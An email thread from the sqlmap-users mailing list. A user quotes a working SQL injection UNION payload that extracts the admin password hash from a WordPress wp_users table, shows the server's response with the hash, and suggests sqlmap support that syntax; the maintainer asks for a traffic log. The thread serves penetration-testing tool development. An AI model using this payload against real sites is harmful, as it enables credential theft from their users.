Hi.

I don't see a reason why this form of UNION test would be any different
than the regular one used by sqlmap. Can you please send me the traffic file
for such a run (... --flush-session -t traffic.txt) along with console
output?

Bye
On Dec 15, 2014 5:50 PM, "Brandon Perry" <bperry.volat...@gmail.com> wrote:

> Hello!
>
> Playing around with the following vulnerability:
>
> http://www.exploit-db.com/exploits/35505/
>
>
> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
> result in a response from the server with the hash of the first user:
>
> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>
>
> However, sqlmap only finds a time based injection. Looking at sqlmap
> through burp, I do see sqlmap doesn't try an injection syntax like the one
> used in the PoC. It may be useful to add a syntax of UNION (SELECT
> CONCAT(blah, blah, blah) FROM blah).
>
> Just a thought!
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>